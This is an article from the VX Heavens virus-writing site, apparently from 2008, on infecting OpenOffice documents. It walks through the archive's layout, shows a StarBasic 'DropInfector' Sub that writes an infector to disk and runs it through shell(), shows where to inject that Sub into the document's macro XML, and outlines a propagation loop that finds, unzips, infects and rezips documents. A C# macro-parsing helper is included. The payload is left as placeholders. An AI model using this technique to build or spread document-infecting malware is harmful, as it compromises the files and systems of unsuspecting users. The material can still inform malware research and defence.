Maximize
Bookmark

VX Heavens

Library Collection Sources Engines Constructors Simulators Utilities Links Antivirus Forum

Some ideas about OpenOffice infection

WarGame
August 2008

[Back to index] [Comments (0)]
  1. Introduction
  2. How an openoffice document is made
  3. How to infect
  4. Code
  5. Last words
  6. Greetz

1) Introduction

This article will try to explain a new way of infecting openoffice documents. Other OO virii have been written using the basic programming language offered by OO, like Starbucks, Stardust or the multi platform BadBunny. It is possible to infect the documents using their simple structure. Let's go!

2) How an openoffice document is made

An OO document is simply a zip archive, so you can "open" a document with any archiving program. This is what you get (it should be the same for all OO documents, created by writer,calc, draw etc...):

content.xml
a plain text XML file
meta.xml
a plain text XML file
settings.xml
a plain text XML file
styles.xml
a plain text XML file
mimetype
a plain text file
META-INF
a directory
Configurations2
a directory
Thumbnails
a directory
Basic
a directory (very interesting!)

How you can see the archive contains text files and directories, I will not waste much time explaining all of them, their name suggest their meaning. Looking deeper I noticed the directory "Basic", it contains the macros defined in the document. This subdirectory contains:

script-lc.xml
a plain text XML file
Standard
a directory

The directory "Standard" contains:

script-lb.xml
a plain text XML file
UserDefined.xml
a plain text XML file (the name of this file depends by the user that created the macros)

Eureka! The file "UserDefined.xml" contains the basic code of the macros!!! We have to play with this file to infect a document using our own macro code. This is what it contains in my example file "Example.odt" (its name is ExampleMacros.xml):

ExampleMacros.xml

   <?xml version="1.0" encoding="UTF-8"?>
   <!DOCTYPE script:module PUBLIC "-//OpenOffice.org//DTD OfficeDocument 1.0//EN" "module.dtd">
   <script:module xmlns:script="http://openoffice.org/2000/script" script:name="ExampleMacros" script:language="StarBasic">REM first macro
   Sub example1
   msgbox &quot;example1&quot;,,&quot;example1&quot;
   End Sub
 
   REM second macro
   Sub example2
   msgbox &quot;example2&quot;,,&quot;example2&quot;
   End Sub
   </script:module>
 

The file is an xml document, it can be parsed in many ways, using libraries or writing your own procedures. We should do a check, infact it's possible to save the documents in an encrypted form using a password, let's look at script-lb.xml (this one is in my example file).

script-lb.xml

   <?xml version="1.0" encoding="UTF-8"?>
   <!DOCTYPE library:library PUBLIC "-//OpenOffice.org//DTD OfficeDocument 1.0//EN" "library.dtd">
   <library:library xmlns:library="http://openoffice.org/2000/library" library:name="Standard" library:readonly="false" library:passwordprotected="false">
   <library:element library:name="ExampleMacros"/>
   </library:library>   
 

We have to check library:passwordprotected, if it is set to true, the document is encrypted.

3) How to infect

We can infect it in two ways (maybe there are more, be creative!)

  1. Adding (or modifying an existing Sub) our own code that drops&executes the code of the infector
  2. Injecting a full functional oo virus written in basic

I prefer the first one (the second one is useless for me), so our injected code should look like this:

   Sub DropInfector
   open path_to_write_the_infector for output as #1
   print #1,... REM write the code of the infector
   close #1
   shell(path_to_write_the_infector,0) REM execute the infector
   End Sub
 

So my example file "ExampleMacros.xml" would become:

   <?xml version="1.0" encoding="UTF-8"?>
   <!DOCTYPE script:module PUBLIC "-//OpenOffice.org//DTD OfficeDocument 1.0//EN" "module.dtd">
   <script:module xmlns:script="http://openoffice.org/2000/script" script:name="ExampleMacros" script:language="StarBasic">REM first macro
   Sub example1
   msgbox &quot;example1&quot;,,&quot;example1&quot;
   End Sub
 
   REM second macro
   Sub example2
   msgbox &quot;example2&quot;,,&quot;example2&quot;
   End Sub
 
   REM Sub added by our infector
   Sub DropInfector
   open path_to_write_the_infector for output as #1
   print #1,... REM write the code of the infector
   close #1
   shell(path_to_write_the_infector,0) REM execute the infector
   End Sub
   </script:module>
 

Our Sub could be also multi platform, look at BadBunny in DoomRiderz#1 for an example, to be more portable. This task could be done in languages like python or C++ that have libraries that help you to accomplish this job (unzipping,xml parsing,rezipping). This is the flow of the infection process:

  1. Find OpenOffice documents (FindFirstFile()/FindNextFile() for Windows, opendir() for unix like systems)
  2. Unzip the found document (zlib can help)
  3. Infect the UserDefined.xml file in the Standard directory
  4. Rezip the document
  5. Go to the first step

An other idea for a nice payload could be editing "content.xml", so the user will see your message!

4) Code

This is an example C# program that shows you how to parse the xml file containing the macro code:

   // GetMacroCode.cs
   // you will need "module.dtd" in the same directory of the program
 
   using System;
   using System.Collections.Generic;
   using System.Text;
   using System.Xml;
 
 
   namespace GetMacroCode
   {
       class Program
       {
           static void Main(string[] args)
           {
               if (args.Length == 0)
               {
                   Console.WriteLine("Specify the xml file!");
               }
 
               else
               {
                   // thx to Retr0
                   XmlReaderSettings settings = new XmlReaderSettings();
                   settings.ProhibitDtd = false;
                   XmlReader xmlRead = XmlReader.Create(args[0],settings);
 
                   while (xmlRead.Read())
                   {
                       if (xmlRead.Name == "script:module")
                       {
                           string macro_code = xmlRead.ReadString(); // macro code is here
                           Console.WriteLine(macro_code);
                       }
                   }
 
                   xmlRead.Close();
               }
           }
       }
   }
 

You will need also the file module.dtd (it's attached to this article) to make this proggy works. (My suggestion is to read the xml file in a "raw" way, without using classes or other stuff).

5) Last words

The explained technique can be expanded in more original ways. OO is a nice suite, but its format is too vulnerable to this kind of attacks. For any comments you can send an e-mail to wargame89@yahoo.it Web: http://vx.netlux.org/wargamevx - http://vx.netlux.org/doomriderz Bye!

6) Greetz

A big thx goes to all #virus,#eof-project,#vx-lab @ undernet

Files:

Donate
friends
deenesitfrplruua